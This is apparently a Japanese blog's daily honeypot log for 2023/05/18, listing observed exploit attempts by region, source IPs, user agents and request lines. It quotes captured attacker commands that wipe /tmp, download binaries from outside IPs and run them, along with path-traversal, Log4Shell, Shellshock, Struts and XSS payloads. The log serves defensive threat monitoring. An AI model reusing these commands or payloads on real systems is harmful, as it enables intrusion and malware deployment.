コンニチハレバレトシタアオゾラ

つれづれなるままに、日暮らし、ぶろぐにむかひて、心にうつりゆくよしなしごとを、そこはかとなく書きつくれば、

2023/05/18 ハニーポット(仮) 観測記録

honeypot

ハニーポット(仮) 観測記録 2023/05/18分です。

特徴
共通

GPONルータの脆弱性を狙うアクセス
CensysInspectによるスキャン行為
zgrabによるスキャン行為
/.envへのスキャン行為
Apache Tomcatへのスキャン行為

Location:JP

D-link製品の脆弱性を狙うアクセス
F5 BIG-IP製品の脆弱性(CVE-2022-1388)を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
.jsへのスキャン行為
/.awsへのスキャン行為
/.gitへのスキャン行為
WordPressへのスキャン行為

を確認しました。

Location:US

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
Apache Log4j2の脆弱性(CVE-2021-44228)を狙うアクセス
D-link製品の脆弱性を狙うアクセス
F5 BIG-IP製品の脆弱性(CVE-2022-1388)を狙うアクセス
FortiOSの脆弱性(CVE-2018-13379)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
Oracle WebLogic脆弱性(CVE-2017-3506)を狙うアクセス
Oracle WebLogic脆弱性(CVE-2018-2894)を狙うアクセス
ShellShock脆弱性(CVE-2014-7169)を狙うアクセス
Spring Cloud Gateway脆弱性(CVE-2022-22947)を狙うアクセス
Nessusによるスキャン行為
.cssへのスキャン行為
.jsへのスキャン行為
/.gitへのスキャン行為
WordPressへのスキャン行為
127.0.0.1に関する不正通信
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  103.188.166.164/jaws;
sh /tmp/jaws
cd /tmp;
rm -rf *;
wget  109.205.213.3/bins/UnHAnaAW.arm;
chmod 777 /tmp/UnHAnaAW.arm;
sh /tmp/UnHAnaAW.arm
cd /tmp;
rm -rf *;
wget 167.71.210.63/jaws;
sh /tmp/jaws
Location:UK

F5 BIG-IP製品の脆弱性(CVE-2022-1388)を狙うアクセス
Spring Cloud Gateway脆弱性(CVE-2022-22947)を狙うアクセス
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 193.23.161.113/jaws;
sh /tmp/jaws
Location:SG

Spring Cloud Gateway脆弱性(CVE-2022-22947)を狙うアクセス
.jsへのスキャン行為
/.awsへのスキャン行為
/.gitへのスキャン行為
5.188.210.227に関する不正通信
Gh0stRATのような動き

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  103.188.166.164/jaws;
sh /tmp/jaws
アクセス数推移

JP:総アクセス数:144 (前日比:-73)
US:総アクセス数:1174 (前日比:1109)
UK:総アクセス数:92 (前日比:-3)
SG:総アクセス数:126 (前日比:26)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数 送信元IPアドレス
1 5.75.162.155 Germany
9 8.222.226.117 Singapore
12 18.188.113.79 United States
2 34.148.48.252 United States
1 35.180.92.93 United States
2 35.199.71.117 United States
2 41.251.249.88 Morocco
18 43.154.141.71 Singapore
1 45.56.108.128 United States
2 45.79.128.205 United States
1 45.79.172.21 United States
1 45.79.181.104 United States
1 45.79.181.223 United States
4 45.95.169.240 Croatia
1 45.128.232.62 Bulgaria
1 52.34.24.241 United States
1 54.160.33.228 United States
6 54.201.244.11 United States
1 54.215.137.17 United States
1 64.227.129.45 United States
8 64.227.170.70 United States
2 65.49.20.67 United States
1 66.175.213.4 United States
1 80.76.51.68 Bulgaria
1 80.87.206.190 Russia
2 91.236.239.72 France
1 104.192.0.50 United States
1 107.170.241.34 United States
1 107.170.245.5 United States
1 107.170.254.15 United States
1 117.252.161.188 India
1 120.86.252.209 China
7 132.145.39.16 United States
4 135.125.217.54 France
9 135.125.244.48 France
1 165.22.36.246 United States
1 167.99.198.98 United States
1 167.248.133.125 United States
1 172.104.11.4 United States
1 172.104.11.34 United States
2 185.100.87.136 Seychelles
1 185.141.110.139 Turkey
8 185.254.196.173 Ukraine
4 185.254.196.186 Ukraine
2 192.155.90.220 United States
1 192.241.218.16 United States
10 193.42.33.58 Bulgaria
1 198.235.24.241 United States
1 205.210.31.145 United States

UserAgent一覧

件数 UserAgent
35 -
4 Abcd
1 Go-http-client/1.1
1 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
2 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
11 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
18 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
4 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
1 Mozilla/5.0 (Windows NT 10.0; rv:108.0) Gecko/20100101 Firefox/108.0
41 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
4 Mozilla/5.0 zgrab/0.x
1 Mozilla/5.0
9 Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
1 Python-urllib/3.6
1 msnbot/0.11 ( http[:]//search[.]msn[.]com/msnbot.htm)
1 python-requests/2.25.1
1 python-requests/2.28.1

リクエスト内容一覧

件数 Method Request Protocol
1 MGLNDD_18.179.20.5_80\n
1 \x16\x03\x01\x01\xfa\x01
4 \x16\x03\x01\x02
17 \x16\x03\x01
1 GET /.aws/credentials HTTP/1.1
1 GET /.env.bak HTTP/1.1
32 GET /.env HTTP/1.1
1 GET /.git/HEAD HTTP/1.1
3 GET /.git/config HTTP/1.1
2 GET /1.php HTTP/1.1
2 GET /18.179.20.5/.env HTTP/1.1
3 GET /_profiler/phpinfo HTTP/1.1
2 GET /admin/.env HTTP/1.1
1 GET /app/.env HTTP/1.1
1 GET /aws.yml HTTP/1.1
1 GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0
1 GET /client/get_targets HTTP/1.1
1 GET /config.js HTTP/1.1
1 GET /config/aws.yml HTTP/1.1
1 GET /druid/index.html HTTP/1.1
5 GET /favicon.ico HTTP/1.1
1 GET /geoip/ HTTP/1.1
1 GET /geoserver/web/ HTTP/1.1
2 GET /info.php HTTP/1.1
1 GET /manager/html HTTP/1.1
1 GET /manager/text/list HTTP/1.1
1 GET /php.php HTTP/1.1
2 GET /phpinfo.php HTTP/1.1
2 GET /phpinfo HTTP/1.1
1 GET /sendgrid/.env HTTP/1.1
1 GET /systembc/password.php HTTP/1.0
1 GET /test.php HTTP/1.1
1 GET /upl.php HTTP/1.1
1 GET /v3/time HTTP/1.1
2 GET /vendor/.env HTTP/1.1
2 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
18 HEAD /Core/Skin/Login.aspx HTTP/1.1
2 HEAD / HTTP/1.1
2 OPTIONS / HTTP/1.0
1 POST /%C0 HTTP/1.1
1 POST /FD873AC4-CF86-4FED-84EC-4BD59C6F17A7 HTTP/1.1
1 POST /HNAP1/ HTTP/1.0
1 POST /app HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
2 POST /cn/cmd HTTP/1.1
1 POST /debug/default/view.html HTTP/1.1
2 POST /debug/default/view?panel=config HTTP/1.1
1 POST /debug/default/view HTTP/1.1
2 POST /dvr/cmd HTTP/1.1
1 POST /frontend/web/debug/default/view HTTP/1.1
1 POST /index.htm HTTP/1.1
1 POST /mgmt/tm/util/bash HTTP/1.1
1 POST /sapi/debug/default/view HTTP/1.1
1 POST /tool/view/phpinfo.view.php HTTP/1.1
1 POST /web/debug/default/view HTTP/1.1
1 POST /wp-config.php-backup HTTP/1.1
Location:US

送信元IPアドレス一覧

件数 送信元IPアドレス
14 20.62.200.27 United States
1 23.98.133.164 United States
1 23.98.191.47 United States
1065 34.173.28.44 United States
1 41.45.45.47 Egypt
1 41.237.241.128 Egypt
2 45.79.128.205 United States
1 45.79.172.21 United States
2 45.79.181.94 United States
1 45.79.181.104 United States
2 45.79.181.223 United States
3 45.95.169.240 Croatia
1 45.128.232.62 Bulgaria
5 54.36.115.221 France
24 54.37.79.75 France
1 54.215.137.17 United States
2 64.62.197.154 United States
1 66.175.213.4 United States
3 79.133.51.240 Germany
4 80.76.51.68 Bulgaria
2 87.121.221.49 Bulgaria
1 95.214.27.53 Bulgaria
1 102.64.69.75 Tanzania
1 107.170.228.12 United States
1 107.170.237.12 United States
1 109.205.213.10 Azerbaijan
2 109.205.213.38 Azerbaijan
2 109.237.98.226 Russia
1 126.159.74.156 Japan
2 152.89.196.144 Russia
2 156.204.143.186 Egypt
1 157.245.100.68 United States
1 158.255.82.115 Russia
1 159.100.30.68 Germany
2 162.142.125.223 United States
2 162.142.125.225 United States
1 162.246.16.194 United States
1 172.104.11.34 United States
1 172.105.128.11 United States
1 177.39.131.52 Brazil
2 179.43.177.243 Panama
1 185.141.110.139 Turkey
2 192.155.90.118 United States
1 192.241.238.12 United States
1 194.165.16.73 Panama
1 198.199.95.87 United States
1 198.235.24.34 United States
1 198.235.24.84 United States
1 205.210.31.159 United States
1 206.189.116.169 United States

UserAgent一覧

件数 UserAgent
69 ${jndi:ldap://log4shell-generic-7odPiZm7w6NTex4S6Jak${lower:ten}.w.nessus.org/nessus}
70 () { _; } >_[$($())] { echo Content-Type: text/plain ; echo ; echo \"bash_cve_2014_6278 Output : $((90+14))\"; }
69 () { ignored; }; echo Content-Type: text/plain ; echo ; echo \"bash_cve_2014_6271_rce Output : $((68+24))\"
66 -
2 Abcd
1 Hello, World
1 Hello, world
807 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
1 Mozilla/5.0 (Linux; Android 10; POCO F1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Mobile Safari/537.36
1 Mozilla/5.0 (Linux; Android 10; Redmi Note 7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.101 Mobile Safari/537.36
1 Mozilla/5.0 (Linux; U; Android 0.5; en-us) AppleWebKit/522 (KHTML, like Gecko) Safari/419.3
1 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1664.3 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
14 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
33 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
6 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
4 Mozilla/5.0 zgrab/0.x
1 Nessus SOAP v0.0.1 (Nessus.org)
15 Nessus
4 python-requests/2.28.2

リクエスト内容一覧

件数 Method Request Protocol
1 -
1 GNUTELLA CONNECT/0.4
1 GNUTELLA CONNECT/0.6
1 MGLNDD_34.68.118.83_80\n
1 \x03
1 \x16\x03\x01\x01H\x01
1 \x16\x03\x01\x01\xfb\x01
1 \x16\x03\x01\x02\xb2\x01
7 \x16\x03\x01\x02
20 \x16\x03\x01
1 \x16\x03\x03\x01\x8e\x01
2 \x16\x03
1 rU
1 GET %. HTTP/1.1
1 GET %5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini HTTP/1.1
1 GET ../../../../../../../../../../../../windows/win.ini HTTP/1.1
1 GET ../../../../../../../../../../../../winnt/win.ini HTTP/1.1
1 GET ..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1
1 GET ..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini HTTP/1.1
1 GET ..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1
1 GET ..\\..\\..\\..\\..\\..\\winnt\\win.ini HTTP/1.1
1 GET ././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../ HTTP/1.1
1 GET .\\.\\.\\.\\.\\.\\.\\.\\.\\.\\/windows/win.ini HTTP/1.1
1 GET .\\.\\.\\.\\.\\.\\.\\.\\.\\.\\/winnt/win.ini HTTP/1.1
1 GET /# HTTP/1.1
1 GET /%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd HTTP/1.1
1 GET /%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini HTTP/1.1
1 GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
1 GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini HTTP/1.1
1 GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/winnt/win.ini HTTP/1.1
1 GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
1 GET /%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\windows\\win.ini HTTP/1.1
1 GET /%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\winnt\\win.ini HTTP/1.1
1 GET /%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini HTTP/1.1
1 GET /%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwinnt%2fwin.ini HTTP/1.1
1 GET /%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin%2eini HTTP/1.1
1 GET /%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1
1 GET /%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwinnt%5cwin%2eini HTTP/1.1
1 GET /%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwinnt%5cwin.ini HTTP/1.1
1 GET /%80../%80../%80../%80../%80../%80../windows/win.ini HTTP/1.1
1 GET /%80../%80../%80../%80../%80../%80../winnt/win.ini HTTP/1.1
1 GET /%NETHOOD%/ HTTP/1.1
1 GET /%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/windows/win.ini HTTP/1.1
1 GET /%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/winnt/win.ini HTTP/1.1
1 GET /%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./windows/win.ini HTTP/1.1
1 GET /%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./winnt/win.ini HTTP/1.1
1 GET /%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/etc/passwd HTTP/1.1
1 GET /%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/windows/win.ini HTTP/1.1
1 GET /%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/winnt/win.ini HTTP/1.1
1 GET /+CSCOE+/logon.html HTTP/1.1
1 GET /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd HTTP/1.1
1 GET /.%252e/.%252e/.%252e/.%252e/windows/win.ini HTTP/1.1
1 GET /.%252e/.%252e/.%252e/.%252e/winnt/win.ini HTTP/1.1
1 GET /.%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1
1 GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1
1 GET /..../..../..../..../..../..../..../..../..../..../..../..../etc/passwd HTTP/1.1
1 GET /..../..../..../..../..../..../..../..../..../windows/win.ini HTTP/1.1
1 GET /..../..../..../..../..../..../..../..../..../winnt/win.ini HTTP/1.1
1 GET /....\\....\\....\\....\\....\\....\\....\\....\\....\\windows\\win.ini HTTP/1.1
1 GET /....\\....\\....\\....\\....\\....\\....\\....\\....\\winnt\\win.ini HTTP/1.1
1 GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1
1 GET /.../.../.../.../.../.../.../.../.../winnt/win.ini HTTP/1.1
1 GET /...\\...\\...\\...\\...\\...\\...\\...\\...\\windows\\win.ini HTTP/1.1
1 GET /...\\...\\...\\...\\...\\...\\...\\...\\...\\winnt\\win.ini HTTP/1.1
1 GET /../../../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
1 GET /../../../../../../../../../../../../winnt/win.ini HTTP/1.1
1 GET /..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1
1 GET /..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini HTTP/1.1
1 GET /..\\pixfir~1\\how_to_login.html HTTP/1.1
1 GET /..htaccess.swp HTTP/1.1
1 GET /./../../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /././.. HTTP/1.1
1 GET /././././././../../../../../etc/passwd HTTP/1.1
1 GET /././././././../../../../../windows/win.ini HTTP/1.1
1 GET /././././././../../../../../winnt/win.ini HTTP/1.1
1 GET /./WEB-INF/ HTTP/1.1
1 GET /.DS_Store HTTP/1.1
1 GET /.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./windows/win.ini HTTP/1.1
1 GET /.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./winnt/win.ini HTTP/1.1
1 GET /.anydomain.test HTTP/1.0
1 GET /.cobalt HTTP/1.1
1 GET /.env',%20'/core/.env',%20'/app/.env',%20'/public/.env','/laravel/.env','/laravel/core/.env','/beta/.env','/kyc/.env','/admin/.env','/prod/.env','/api/.env HTTP/1.1
36 GET /.env HTTP/1.1
5 GET /.git/config HTTP/1.1
1 GET /.htaccess.1 HTTP/1.1
1 GET /.htaccess.bak HTTP/1.1
1 GET /.htaccess.copy HTTP/1.1
1 GET /.htaccess.old HTTP/1.1
1 GET /.htaccess.tmp HTTP/1.1
1 GET /.htaccess.~1~ HTTP/1.1
1 GET /.htaccess HTTP/1.1
1 GET /.htaccess~ HTTP/1.1
1 GET /.htpasswd HTTP/1.1
1 GET /.svn/entries HTTP/1.1
1 GET //${%23context['xwork.MethodAccessor.denyMethodExecution']=!(%23_memberAccess['allowStaticMethodAccess']=true),(@java.lang.Runtime@getRuntime()).exec('id').waitFor()}.action HTTP/1.1
1 GET //${%23w%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),%23w.print('Nessus%20Response:%20'),%23w.println('struts_2_3_14_3_command_execution-602509635'),%23w.flush(),%23w.close()}.action HTTP/1.1
1 GET //${602509635+5}.action HTTP/1.1
1 GET //../../../../../../../../../../../../etc/passwd HTTP/1.1
1 GET //Help[.]action HTTP/1.1
6 GET // HTTP/1.1
1 GET //admincp/login.php HTTP/1.1
1 GET //etc/passwd HTTP/1.1
1 GET //fgoLpDYn[.]asp HTTP/1.0
1 GET //idcplg?IdcService=GET_ENVIRONMENT&IsJson=1 HTTP/1.1
1 GET //login/login HTTP/1.1
1 GET //login[.]jsp HTTP/1.1
1 GET //perl?-v HTTP/1.1
1 GET //perl[.]exe?-v HTTP/1.1
1 GET //struts/webconsole.html HTTP/1.1
1 GET //user/index.php HTTP/1.1
1 GET //wbm/login/ HTTP/1.1
1 GET /1.php HTTP/1.1
1 GET /1684316510/certificate/83.118.68.34.bc.googleusercontent.com HTTP/1.1
1 GET /1684316510/facts/83.118.68.34.bc.googleusercontent.com HTTP/1.1
1 GET /2019/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /2020/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /2021/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /2o3m59b8.asp?<meta%20http-equiv=Set-Cookie%20content=%22testzbdm=9118%22> HTTP/1.1
1 GET /2o3m59b8.asp?<script>document.cookie=%22testzbdm=9118;%22</script> HTTP/1.1
1 GET /2o3m59b8.aspx?<meta%20http-equiv=Set-Cookie%20content=%22testzbdm=9118%22> HTTP/1.1
1 GET /2o3m59b8.aspx?<script>document.cookie=%22testzbdm=9118;%22</script> HTTP/1.1
1 GET /2o3m59b8.cfc?<meta%20http-equiv=Set-Cookie%20content=%22testzbdm=9118%22> HTTP/1.1
1 GET /2o3m59b8.cfc?<script>document.cookie=%22testzbdm=9118;%22</script> HTTP/1.1
1 GET /2o3m59b8.cfm?<meta%20http-equiv=Set-Cookie%20content=%22testzbdm=9118%22> HTTP/1.1
1 GET /2o3m59b8.cfm?<script>document.cookie=%22testzbdm=9118;%22</script> HTTP/1.1
1 GET /2o3m59b8.cgi?<meta%20http-equiv=Set-Cookie%20content=%22testzbdm=9118%22> HTTP/1.1
1 GET /2o3m59b8.cgi?<script>document.cookie=%22testzbdm=9118;%22</script> HTTP/1.1
1 GET /2o3m59b8.dll?<meta%20http-equiv=Set-Cookie%20content=%22testzbdm=9118%22> HTTP/1.1
1 GET /2o3m59b8.dll?<script>document.cookie=%22testzbdm=9118;%22</script> HTTP/1.1
1 GET /2o3m59b8.do?<meta%20http-equiv=Set-Cookie%20content=%22testzbdm=9118%22> HTTP/1.1
1 GET /2o3m59b8.do?<script>document.cookie=%22testzbdm=9118;%22</script> HTTP/1.1
1 GET /2o3m59b8.exe?<meta%20http-equiv=Set-Cookie%20content=%22testzbdm=9118%22> HTTP/1.1
1 GET /2o3m59b8.exe?<script>document.cookie=%22testzbdm=9118;%22</script> HTTP/1.1
1 GET /2o3m59b8.fts?<meta%20http-equiv=Set-Cookie%20content=%22testzbdm=9118%22> HTTP/1.1
1 GET /2o3m59b8.fts?<script>document.cookie=%22testzbdm=9118;%22</script> HTTP/1.1
1 GET /2o3m59b8.htm?<meta%20http-equiv=Set-Cookie%20content=%22testzbdm=9118%22> HTTP/1.1
1 GET /2o3m59b8.htm?<script>document.cookie=%22testzbdm=9118;%22</script> HTTP/1.1
1 GET /2o3m59b8.html?<meta%20http-equiv=Set-Cookie%20content=%22testzbdm=9118%22> HTTP/1.1
1 GET /2o3m59b8.html?<script>document.cookie=%22testzbdm=9118;%22</script> HTTP/1.1
1 GET /2o3m59b8.idc?<meta%20http-equiv=Set-Cookie%20content=%22testzbdm=9118%22> HTTP/1.1
1 GET /2o3m59b8.idc?<script>document.cookie=%22testzbdm=9118;%22</script> HTTP/1.1
1 GET /2o3m59b8.jsp?<meta%20http-equiv=Set-Cookie%20content=%22testzbdm=9118%22> HTTP/1.1
1 GET /2o3m59b8.jsp?<script>document.cookie=%22testzbdm=9118;%22</script> HTTP/1.1
1 GET /2o3m59b8.jspa?<meta%20http-equiv=Set-Cookie%20content=%22testzbdm=9118%22> HTTP/1.1
1 GET /2o3m59b8.jspa?<script>document.cookie=%22testzbdm=9118;%22</script> HTTP/1.1
1 GET /2o3m59b8.kspx?<meta%20http-equiv=Set-Cookie%20content=%22testzbdm=9118%22> HTTP/1.1
1 GET /2o3m59b8.kspx?<script>document.cookie=%22testzbdm=9118;%22</script> HTTP/1.1
1 GET /2o3m59b8.mscgi?<meta%20http-equiv=Set-Cookie%20content=%22testzbdm=9118%22> HTTP/1.1
1 GET /2o3m59b8.mscgi?<script>document.cookie=%22testzbdm=9118;%22</script> HTTP/1.1
1 GET /2o3m59b8.nsf?<meta%20http-equiv=Set-Cookie%20content=%22testzbdm=9118%22> HTTP/1.1
1 GET /2o3m59b8.nsf?<script>document.cookie=%22testzbdm=9118;%22</script> HTTP/1.1
1 GET /2o3m59b8.php3?<meta%20http-equiv=Set-Cookie%20content=%22testzbdm=9118%22> HTTP/1.1
1 GET /2o3m59b8.php3?<script>document.cookie=%22testzbdm=9118;%22</script> HTTP/1.1
1 GET /2o3m59b8.php?<meta%20http-equiv=Set-Cookie%20content=%22testzbdm=9118%22> HTTP/1.1
1 GET /2o3m59b8.php?<script>document.cookie=%22testzbdm=9118;%22</script> HTTP/1.1
1 GET /2o3m59b8.pl?<meta%20http-equiv=Set-Cookie%20content=%22testzbdm=9118%22> HTTP/1.1
1 GET /2o3m59b8.pl?<script>document.cookie=%22testzbdm=9118;%22</script> HTTP/1.1
1 GET /2o3m59b8.x?<meta%20http-equiv=Set-Cookie%20content=%22testzbdm=9118%22> HTTP/1.1
1 GET /2o3m59b8.x?<script>document.cookie=%22testzbdm=9118;%22</script> HTTP/1.1
1 GET /3daUX9it.aspx HTTP/1.1
1 GET /431cb5237001e73e794398e4fa3cf660/css/main-green.css HTTP/1.1
1 GET /<meta%20http-equiv=Set-Cookie%20content=%22testzbdm=9118%22> HTTP/1.1
1 GET /<script>document.cookie=%22testzbdm=9118;%22</script> HTTP/1.1
1 GET /<script>foo</script> HTTP/1.1
1 GET /?<meta%20http-equiv=Set-Cookie%20content=%22testzbdm=9118%22> HTTP/1.1
1 GET /?<script>document.cookie=%22testzbdm=9118;%22</script> HTTP/1.1
1 GET /?M=A HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?\"><script>alert('struts_sa_surl_xss.nasl-1684316573')</script> HTTP/1.1
2 GET /? HTTP/1.1
1 GET /?class.classLoader.URLs[0]=struts_2_3_16_1_classloader_manipulation-1684316574 HTTP/1.1
1 GET /?ho+{COMPLETE_VERSION} HTTP/1.1
1 GET /ARDhDIdn.rem HTTP/1.1
1 GET /AdminTools/querybuilder/nn.jsp HTTP/1.1
1 GET /CFIDE/administrator/index.cfm HTTP/1.1
1 GET /CFIDE/administrator/settings/version.cfm HTTP/1.1
2 GET /CSCOnm/servlet/login/login.jsp HTTP/1.1
1 GET /CVS/Entries HTTP/1.1
1 GET /ConsoleHelp/default.jsp HTTP/1.1
1 GET /ControlManager/default.htm HTTP/1.1
1 GET /ControllerWeb/ HTTP/1.1
